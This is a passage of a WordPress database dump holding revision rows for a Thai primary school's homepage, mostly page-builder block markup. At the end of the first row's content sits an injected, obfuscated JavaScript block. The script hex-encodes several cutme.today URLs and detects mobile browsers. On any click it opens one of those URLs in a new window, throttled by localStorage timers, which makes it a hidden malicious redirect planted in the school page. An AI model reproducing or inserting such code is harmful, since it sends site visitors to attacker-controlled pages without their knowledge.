(55,1,'2024-07-27 10:52:43','2024-07-27 03:52:43','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"10px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"10px\",\"paddingLeft\":\"20px\"},\"backgroundColor\":\"#0366d6\",\"backgroundColorHover\":\"#222222\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:52:43','2024-07-27 03:52:43','',14,'http://pakhaeng.ssk.in.th/?p=55',0,'revision','',0),
(56,1,'2024-07-27 10:54:50','2024-07-27 03:54:50','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button 